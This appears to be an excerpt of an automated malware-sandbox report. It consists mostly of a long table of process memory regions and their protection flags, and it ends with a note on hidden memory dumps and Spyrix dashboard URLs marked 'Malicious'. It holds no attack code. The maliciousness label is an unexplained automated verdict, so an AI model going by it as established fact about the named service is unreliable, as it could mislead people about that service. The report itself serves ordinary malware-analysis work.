direct allocation
page execute and read and write
544000
heap
page read and write
7294000
heap
page read and write
2D36000
heap
page read and write
97E000
stack
page read and write
35A5000
heap
page read and write
510F57F000
stack
page read and write
41A0000
direct allocation
page execute and read and write
2268000
direct allocation
page read and write
35D0000
direct allocation
page execute and read and write
C25000
heap
page read and write
90C000
heap
page read and write
C25000
heap
page read and write
2F10000
heap
page read and write
938000
heap
page read and write
568B000
heap
page read and write
7378000
heap
page read and write
CCB000
heap
page read and write
2762000
heap
page read and write
90F000
heap
page read and write
4360000
direct allocation
page execute and read and write
CD4000
heap
page read and write
4180000
direct allocation
page execute and read and write
3240000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
921000
heap
page read and write
3AB0000
direct allocation
page execute and read and write
4DE0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
1DBE000
heap
page read and write
181B000
heap
page read and write
4A8E000
stack
page read and write
3459000
direct allocation
page read and write
93000
stack
page read and write
81B0000
trusted library allocation
page read and write
2DB0000
heap
page read and write
2662000
direct allocation
page read and write
677D000
heap
page read and write
544000
heap
page read and write
2247000
direct allocation
page read and write
C90000
heap
page read and write
3B10000
direct allocation
page execute and read and write
34C4000
heap
page read and write
C0F000
heap
page read and write
7294000
heap
page read and write
3A4000
heap
page read and write
3920000
direct allocation
page execute and read and write
3EC0000
direct allocation
page execute and read and write
34C4000
heap
page read and write
770000
heap
page read and write
2CDF000
stack
page read and write
223F000
direct allocation
page read and write
111A000
unkown
page write copy
3F50000
direct allocation
page execute and read and write
34C4000
heap
page read and write
7607000
direct allocation
page read and write
7160000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
4140000
direct allocation
page execute and read and write
4556000
direct allocation
page read and write
2D7D000
stack
page read and write
3A4000
heap
page read and write
1666000
unkown
page execute and write copy
279A000
heap
page read and write
34C4000
heap
page read and write
3950000
direct allocation
page execute and read and write
22C4000
direct allocation
page read and write
211BD6E000
stack
page read and write
720F000
stack
page read and write
708000
heap
page read and write
3100000
heap
page read and write
22E3000
direct allocation
page read and write
35A7000
heap
page read and write
544000
heap
page read and write
2304000
direct allocation
page read and write
111B000
unkown
page readonly
3200000
heap
page read and write
26CD000
stack
page read and write
544000
heap
page read and write
3A4000
heap
page read and write
8130000
trusted library allocation
page read and write
929000
unkown
page execute and read and write
8E5000
heap
page read and write
6EF000
heap
page read and write
2F9000
stack
page read and write
4548000
direct allocation
page read and write
710000
heap
page read and write
304F000
stack
page read and write
34AC000
direct allocation
page read and write
71C6000
heap
page read and write
34C4000
heap
page read and write
7FE10000
direct allocation
page read and write
3AD0000
direct allocation
page execute and read and write
2D0E000
unkown
page read and write
33C8000
direct allocation
page read and write
3CD0000
direct allocation
page execute and read and write
DC0000
unkown
page readonly
35F0000
direct allocation
page execute and read and write
2F1F000
stack
page read and write
6D90000
heap
page execute and read and write
7060000
heap
page read and write
8B8000
heap
page read and write
42E0000
direct allocation
page execute and read and write
71C2000
heap
page read and write
3760000
direct allocation
page execute and read and write
2B60000
heap
page read and write
CC3000
heap
page read and write
7FE40000
direct allocation
page read and write
2F20000
heap
page read and write
2761000
heap
page read and write
7224000
heap
page read and write
36CD000
direct allocation
page read and write
111A000
unkown
page write copy
744A000
heap
page read and write
C21000
heap
page read and write
8130000
trusted library allocation
page read and write
2FFE000
stack
page read and write
95F000
stack
page read and write
AA3000
heap
page read and write
2F4E000
stack
page read and write
970000
heap
page read and write
8130000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
7432000
heap
page read and write
890000
unkown
page execute and write copy
8FB000
heap
page read and write
291C000
stack
page read and write
710000
heap
page read and write
27A1000
heap
page read and write
7225000
heap
page read and write
CCA000
heap
page read and write
44A0000
direct allocation
page read and write
71C3000
heap
page read and write
463C000
direct allocation
page read and write
2C58000
heap
page read and write
71C2000
heap
page read and write
3DB0000
direct allocation
page execute and read and write
30D0000
heap
page read and write
9EB000
heap
page read and write
397E000
stack
page read and write
544000
heap
page read and write
98E000
stack
page read and write
34C4000
heap
page read and write
7419000
heap
page read and write
49B0000
heap
page read and write
32E3000
direct allocation
page read and write
278B000
heap
page read and write
2760000
trusted library allocation
page read and write
4050000
direct allocation
page execute and read and write
1116000
unkown
page write copy
412000
unkown
page write copy
3CA0000
direct allocation
page execute and read and write
41D0000
direct allocation
page execute and read and write
2757000
trusted library allocation
page read and write
2A8D000
stack
page read and write
3AF0000
direct allocation
page execute and read and write
4350000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
2681000
direct allocation
page read and write
6F7000
heap
page read and write
71C3000
heap
page read and write
9EC000
heap
page read and write
8E6000
heap
page read and write
71C2000
heap
page read and write
638000
stack
page read and write
3690000
heap
page read and write
7A0000
heap
page read and write
2F2A000
heap
page read and write
5050000
heap
page read and write
2F0E000
stack
page read and write
3572000
heap
page read and write
6F2000
heap
page read and write
74DD000
heap
page read and write
66DE000
stack
page read and write
70A000
heap
page read and write
3730000
direct allocation
page execute and read and write
7297000
heap
page read and write
2FAE000
stack
page read and write
C21000
heap
page read and write
6781000
heap
page read and write
930000
heap
page read and write
3BB0000
direct allocation
page execute and read and write
75D000
stack
page read and write
9FE000
stack
page read and write
1116000
unkown
page read and write
2300000
heap
page read and write
CC5000
heap
page read and write
3A4000
heap
page read and write
35A5000
heap
page read and write
3560000
heap
page read and write
2F20000
heap
page read and write
851000
heap
page read and write
744D000
heap
page read and write
8130000
trusted library allocation
page read and write
544000
heap
page read and write
43E000
unkown
page readonly
22BC000
direct allocation
page read and write
3A4000
heap
page read and write
71B8000
heap
page read and write
8D9000
heap
page read and write
1F0000
heap
page read and write
35A5000
heap
page read and write
7731000
direct allocation
page read and write
81B0000
trusted library allocation
page read and write
741E000
heap
page read and write
2B61000
heap
page read and write
7FDF0000
direct allocation
page read and write
279B000
heap
page read and write
9AF000
stack
page read and write
358C000
heap
page read and write
8130000
trusted library allocation
page read and write
3710000
direct allocation
page execute and read and write
3396000
direct allocation
page execute and read and write
36F0000
heap
page read and write
27AA000
trusted library allocation
page read and write
1750000
heap
page read and write
44B2000
direct allocation
page read and write
2D68000
heap
page read and write
7FD2E000
direct allocation
page read and write
4FE1000
direct allocation
page read and write
3870000
direct allocation
page execute and read and write
907000
heap
page read and write
2D10000
heap
page read and write
2CBF000
stack
page read and write
28AE000
stack
page read and write
544000
heap
page read and write
722000
heap
page read and write
35AB000
heap
page read and write
17E3000
heap
page read and write
2787000
trusted library allocation
page read and write
918E000
stack
page read and write
3397000
heap
page read and write
7297000
heap
page read and write
71C5000
heap
page read and write
3E30000
direct allocation
page execute and read and write
B1E000
stack
page read and write
4902000
direct allocation
page read and write
800000
heap
page read and write
2641000
trusted library allocation
page read and write
2F18000
heap
page read and write
C0D000
heap
page read and write
7184000
trusted library allocation
page read and write
1EB000
stack
page read and write
4FE8000
direct allocation
page read and write
910000
heap
page read and write
270D000
stack
page read and write
3850000
direct allocation
page execute and read and write
3EF0000
direct allocation
page execute and read and write
34C4000
heap
page read and write
4030000
direct allocation
page execute and read and write
3EB0000
direct allocation
page execute and read and write
3CB0000
direct allocation
page execute and read and write
3A4000
heap
page read and write
2D6D000
heap
page read and write
16E0000
heap
page read and write
2C00000
heap
page read and write
2795000
heap
page read and write
61E88000
unkown
page read and write
19B000
stack
page read and write
111B000
unkown
page readonly
31C0000
direct allocation
page read and write
174000
stack
page read and write
30FF000
stack
page read and write
DC0000
unkown
page readonly
8CE000
stack
page read and write
3030000
heap
page read and write
2B2D000
stack
page read and write
488F000
stack
page read and write
35A1000
heap
page read and write
34C4000
heap
page read and write
452B000
direct allocation
page read and write
111B000
unkown
page readonly
36B0000
direct allocation
page read and write
A84000
unkown
page execute and read and write
5651000
heap
page read and write
60B000
heap
page read and write
8D2000
heap
page read and write
8790000
trusted library allocation
page read and write
2F9B000
heap
page read and write
4F20000
trusted library section
page readonly
8D0000
trusted library allocation
page read and write
A05000
heap
page read and write
869000
unkown
page execute and write copy
C25000
heap
page read and write
960F000
stack
page read and write
71D7000
heap
page read and write
544000
heap
page read and write
DC0000
unkown
page readonly
5D6000
heap
page read and write
4FC6000
direct allocation
page read and write
61E98000
unkown
page read and write
22D2000
direct allocation
page read and write
60E000
heap
page read and write
7297000
heap
page read and write
C20000
heap
page read and write
A43000
heap
page read and write
897000
heap
page read and write
3770000
heap
page read and write
4DF0000
heap
page execute and read and write
3A4000
heap
page read and write
31DF000
stack
page read and write
3B70000
direct allocation
page execute and read and write
4390000
direct allocation
page execute and read and write
3A4000
heap
page read and write
341C000
direct allocation
page read and write
73D6000
heap
page read and write
8CB000
heap
page read and write
31E0000
heap
page read and write
C63000
trusted library allocation
page execute and read and write
2A4F000
stack
page read and write
6770000
heap
page read and write
1DBC000
heap
page read and write
705C000
heap
page read and write
2490000
heap
page read and write
CD0000
heap
page read and write
2389000
heap
page read and write
1855000
heap
page read and write
71D6000
heap
page read and write
2F1F000
heap
page read and write
89D000
stack
page read and write
39C0000
direct allocation
page execute and read and write
2FE0000
heap
page read and write
3B40000
direct allocation
page execute and read and write
22F8000
direct allocation
page read and write
3890000
direct allocation
page execute and read and write
743C000
heap
page read and write
3463000
direct allocation
page read and write
61E8A000
unkown
page readonly
34C4000
heap
page read and write
2EDD000
stack
page read and write
51BE000
stack
page read and write
1CC0000
heap
page read and write
CD9000
heap
page read and write
747A000
heap
page read and write
3351000
direct allocation
page execute and read and write
7FDF0000
direct allocation
page read and write
2796000
trusted library allocation
page read and write
1BC000
stack
page read and write
81D0000
trusted library allocation
page read and write
544000
heap
page read and write
722000
heap
page read and write
1A6E000
stack
page read and write
36B9000
trusted library allocation
page read and write
39A0000
direct allocation
page execute and read and write
1052000
unkown
page readonly
2385000
heap
page read and write
3070000
heap
page read and write
2D90000
heap
page read and write
71C2000
heap
page read and write
725000
heap
page read and write
33C0000
direct allocation
page read and write
2F50000
heap
page read and write
3A4000
heap
page read and write
81B0000
trusted library allocation
page read and write
2D0E000
stack
page read and write
855000
heap
page read and write
71B8000
heap
page read and write
56D000
stack
page read and write
8130000
trusted library allocation
page read and write
7FDDB000
direct allocation
page read and write
71C2000
heap
page read and write
544000
heap
page read and write
345B000
direct allocation
page read and write
7E20000
trusted library allocation
page read and write
718000
heap
page read and write
2EA8000
heap
page read and write
32F0000
direct allocation
page read and write
890000
unkown
page execute and read and write
2762000
trusted library allocation
page read and write
1B4F000
stack
page read and write
7FE17000
direct allocation
page read and write
1116000
unkown
page read and write
570000
heap
page read and write
647000
heap
page read and write
544000
heap
page read and write
3C60000
direct allocation
page execute and read and write
2B20000
heap
page read and write
49C000
stack
page read and write
31D0000
direct allocation
page execute and read and write
7224000
heap
page read and write
2530000
heap
page read and write
5050000
heap
page read and write
3200000
remote allocation
page read and write
80D000
heap
page read and write
71B0000
trusted library allocation
page read and write
CD0000
heap
page read and write
610000
heap
page read and write
8130000
trusted library allocation
page read and write
2F60000
heap
page read and write
78D0000
trusted library allocation
page read and write
7294000
heap
page read and write
8130000
trusted library allocation
page read and write
4100000
direct allocation
page execute and read and write
500F000
stack
page read and write
A1A000
heap
page read and write
8130000
trusted library allocation
page read and write
7174000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
1FE000
heap
page read and write
9E0000
heap
page read and write
3A4000
heap
page read and write
6776000
heap
page read and write
8130000
trusted library allocation
page read and write
916000
heap
page read and write
6F9000
heap
page read and write
3A4000
heap
page read and write
400000
unkown
page readonly
2B8D000
stack
page read and write
78D0000
trusted library allocation
page read and write
34C4000
heap
page read and write
5AF000
unkown
page write copy
3428000
direct allocation
page read and write
6EC000
heap
page read and write
A05000
heap
page read and write
97E000
stack
page read and write
8130000
trusted library allocation
page read and write
4591000
direct allocation
page read and write
34C4000
heap
page read and write
DC1000
unkown
page execute read
C2A000
heap
page read and write
2533000
heap
page read and write
3487000
direct allocation
page read and write
544000
heap
page read and write
34C4000
heap
page read and write
111A000
unkown
page write copy
865000
heap
page read and write
7435000
heap
page read and write
370000
heap
page read and write
C80000
trusted library allocation
page read and write
4F40000
heap
page read and write
8130000
trusted library allocation
page read and write
4E1F000
stack
page read and write
34C4000
heap
page read and write
2F16000
heap
page read and write
3A4000
heap
page read and write
7E20000
trusted library allocation
page read and write
450A000
direct allocation
page read and write
88FD000
stack
page read and write
298E000
stack
page read and write
940000
heap
page read and write
36B0000
heap
page read and write
2D30000
heap
page read and write
804000
heap
page read and write
7C0000
heap
page read and write
67DF000
stack
page read and write
2DAE000
heap
page read and write
7409000
heap
page read and write
3A4000
heap
page read and write
39D0000
direct allocation
page execute and read and write
39F0000
direct allocation
page execute and read and write
3C50000
direct allocation
page execute and read and write
4BF0000
heap
page read and write
32CE000
stack
page read and write
990000
heap
page read and write
2F19000
heap
page read and write
22AD000
direct allocation
page read and write
CC2000
heap
page read and write
8130000
trusted library allocation
page read and write
34C4000
heap
page read and write
349C000
direct allocation
page read and write
3810000
heap
page read and write
7061000
heap
page read and write
71B8000
heap
page read and write
2D7C000
stack
page read and write
3D80000
direct allocation
page execute and read and write
670000
heap
page read and write
274F000
trusted library allocation
page read and write
2BB000
stack
page read and write
630000
heap
page read and write
1111000
unkown
page read and write
8C8000
heap
page read and write
2A3E000
stack
page read and write
8130000
trusted library allocation
page read and write
2E20000
heap
page read and write
4250000
direct allocation
page execute and read and write
544000
heap
page read and write
CD5000
heap
page read and write
5A1000
unkown
page write copy
8130000
trusted library allocation
page read and write
22E8000
direct allocation
page read and write
359B000
heap
page read and write
34C4000
heap
page read and write
5FE000
stack
page read and write
401000
unkown
page execute read
2F1D000
heap
page read and write
2BB000
stack
page read and write
855000
heap
page read and write
8130000
trusted library allocation
page read and write
2F23000
heap
page read and write
CC3000
heap
page read and write
8130000
trusted library allocation
page read and write
3238000
heap
page read and write
6852000
heap
page read and write
4C3F000
stack
page read and write
A00000
heap
page read and write
718000
heap
page read and write
C1B000
heap
page read and write
81B0000
trusted library allocation
page read and write
9FC000
stack
page read and write
4541000
direct allocation
page read and write
35AB000
heap
page read and write
3EE0000
direct allocation
page execute and read and write
722000
heap
page read and write
5BA000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
358D000
heap
page read and write
301F000
stack
page read and write
34C4000
heap
page read and write
4F1E000
stack
page read and write
5DF000
stack
page read and write
71C1000
heap
page read and write
C21000
heap
page read and write
3FA0000
direct allocation
page execute and read and write
2133000
direct allocation
page read and write
544000
heap
page read and write
63D000
heap
page read and write
4B7E000
stack
page read and write
2690000
direct allocation
page read and write
71B9000
heap
page read and write
2BF0000
heap
page read and write
510F4FF000
stack
page read and write
859000
heap
page read and write
5C0000
heap
page read and write
32F0000
direct allocation
page read and write
890000
heap
page read and write
17D7000
heap
page read and write
3D90000
direct allocation
page execute and read and write
34C4000
heap
page read and write
231A000
direct allocation
page read and write
90D000
heap
page read and write
544000
heap
page read and write
70F000
heap
page read and write
81B0000
trusted library allocation
page read and write
401000
unkown
page execute and write copy
1FA64A90000
heap
page read and write
73C000
heap
page read and write
2798000
heap
page read and write
3290000
heap
page read and write
289D000
stack
page read and write
7FD5E000
direct allocation
page read and write
4200000
direct allocation
page execute and read and write
865000
unkown
page execute and write copy
630000
heap
page read and write
1DB0000
heap
page read and write
37D0000
direct allocation
page execute and read and write
32F0000
direct allocation
page read and write
3364000
direct allocation
page execute and read and write
2D8E000
stack
page read and write
38A0000
direct allocation
page execute and read and write
1F0000
heap
page read and write
CBD000
heap
page read and write
1F6000
heap
page read and write
7A0000
heap
page read and write
A2AF000
stack
page read and write
7224000
heap
page read and write
8130000
trusted library allocation
page read and write
7481000
heap
page read and write
1117000
unkown
page write copy
3A4000
heap
page read and write
61E9B000
unkown
page read and write
544000
heap
page read and write
4EE0000
heap
page read and write
26BB000
direct allocation
page read and write
CC4000
heap
page read and write
1864000
heap
page read and write
44A0000
direct allocation
page read and write
2DF0000
heap
page read and write
506000
unkown
page read and write
510F47B000
stack
page read and write
35A1000
heap
page read and write
3840000
direct allocation
page execute and read and write
2BF0000
heap
page read and write
86F0000
trusted library allocation
page execute and read and write
900000
heap
page read and write
9E90000
trusted library allocation
page read and write
22EF000
direct allocation
page read and write
7FD50000
direct allocation
page read and write
3A4000
heap
page read and write
884000
heap
page read and write
6FC000
heap
page read and write
AC8000
heap
page read and write
7E20000
trusted library allocation
page read and write
2FFE000
stack
page read and write
34C4000
heap
page read and write
341C000
direct allocation
page read and write
73F7000
heap
page read and write
906000
heap
page read and write
34C4000
heap
page read and write
4420000
direct allocation
page execute and read and write
339A000
heap
page read and write
3660000
direct allocation
page execute and read and write
7413000
heap
page read and write
3571000
heap
page read and write
104E000
unkown
page read and write
36DC000
direct allocation
page read and write
AF0000
heap
page read and write
342F000
direct allocation
page read and write
72EE000
stack
page read and write
227D000
direct allocation
page read and write
544000
heap
page read and write
8130000
trusted library allocation
page read and write
7225000
heap
page read and write
1052000
unkown
page readonly
2D38000
heap
page read and write
3DE0000
direct allocation
page execute and read and write
76A2000
direct allocation
page read and write
400000
unkown
page readonly
34C4000
heap
page read and write
34C4000
heap
page read and write
3CE0000
direct allocation
page execute and read and write
3A4000
heap
page read and write
738C000
heap
page read and write
32F0000
direct allocation
page read and write
450000
heap
page read and write
7061000
heap
page read and write
2D5A000
heap
page read and write
78F000
stack
page read and write
550000
heap
page read and write
C90000
heap
page read and write
3640000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
16D0000
heap
page read and write
26A0000
heap
page execute and read and write
773F000
direct allocation
page read and write
29D0000
heap
page read and write
61E88000
unkown
page write copy
8C0E000
stack
page read and write
4C10000
trusted library allocation
page read and write
C82000
trusted library allocation
page read and write
1849000
heap
page read and write
C70000
trusted library allocation
page read and write
3C30000
direct allocation
page execute and read and write
4040000
direct allocation
page execute and read and write
4380000
direct allocation
page execute and read and write
4CDF000
stack
page read and write
3BC0000
direct allocation
page execute and read and write
6E9000
heap
page read and write
2E6E000
stack
page read and write
3490000
heap
page read and write
34C4000
heap
page read and write
81B0000
trusted library allocation
page read and write
CC2000
heap
page read and write
3670000
direct allocation
page execute and read and write
2791000
heap
page read and write
7FDCE000
direct allocation
page read and write
277D000
heap
page read and write
DC0000
unkown
page readonly
502000
unkown
page read and write
806000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
3900000
direct allocation
page execute and read and write
701000
heap
page read and write
8130000
trusted library allocation
page read and write
32C3000
direct allocation
page read and write
2F40000
heap
page read and write
DC1000
unkown
page execute read
7EE000
heap
page read and write
8130000
trusted library allocation
page read and write
8FC000
heap
page read and write
C21000
heap
page read and write
133F000
stack
page read and write
346A000
direct allocation
page read and write
87FE000
stack
page read and write
C27000
heap
page read and write
1052000
unkown
page readonly
57EB000
heap
page read and write
34B8000
heap
page read and write
71C8000
heap
page read and write
5B9000
heap
page read and write
185E000
heap
page read and write
4F70000
heap
page read and write
AA0000
heap
page read and write
CC4000
heap
page read and write
81B0000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
5140000
heap
page read and write
3ED0000
direct allocation
page execute and read and write
3940000
direct allocation
page execute and read and write
C0C000
heap
page read and write
3820000
direct allocation
page execute and read and write
8BC000
heap
page read and write
850000
heap
page read and write
DC1000
unkown
page execute read
42B0000
direct allocation
page execute and read and write
34C4000
heap
page read and write
8130000
trusted library allocation
page read and write
33AE000
direct allocation
page execute and read and write
2F80000
heap
page read and write
3700000
direct allocation
page execute and read and write
923E000
stack
page read and write
3A4000
heap
page read and write
C8C000
heap
page read and write
27E0000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
4490000
direct allocation
page execute and read and write
904E000
stack
page read and write
CDB000
heap
page read and write
8C2000
heap
page read and write
3478000
direct allocation
page read and write
1CAE000
stack
page read and write
9A0000
heap
page read and write
8130000
trusted library allocation
page read and write
C25000
heap
page read and write
2520000
direct allocation
page read and write
3A4000
heap
page read and write
7FD32000
direct allocation
page read and write
2D36000
heap
page read and write
3A4000
heap
page read and write
6771000
heap
page read and write
40D0000
direct allocation
page execute and read and write
8D5000
heap
page read and write
2EC0000
heap
page read and write
6784000
heap
page read and write
2DCF000
stack
page read and write
544000
heap
page read and write
3AA0000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
3B00000
direct allocation
page execute and read and write
2C3F000
stack
page read and write
6FCD000
stack
page read and write
CC4000
heap
page read and write
30FA000
heap
page read and write
3A4000
heap
page read and write
3338000
direct allocation
page read and write
4310000
direct allocation
page execute and read and write
303F000
stack
page read and write
44E1000
direct allocation
page read and write
2658000
heap
page read and write
DC0000
unkown
page readonly
8130000
trusted library allocation
page read and write
57B0000
heap
page read and write
DC1000
unkown
page execute read
3A4000
heap
page read and write
1FA64A84000
heap
page read and write
7FD6D000
direct allocation
page read and write
2DCE000
stack
page read and write
455D000
direct allocation
page read and write
6500000
direct allocation
page read and write
740D000
heap
page read and write
104E000
unkown
page write copy
A14000
heap
page read and write
3A4000
heap
page read and write
3700000
heap
page read and write
There are 2479 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/login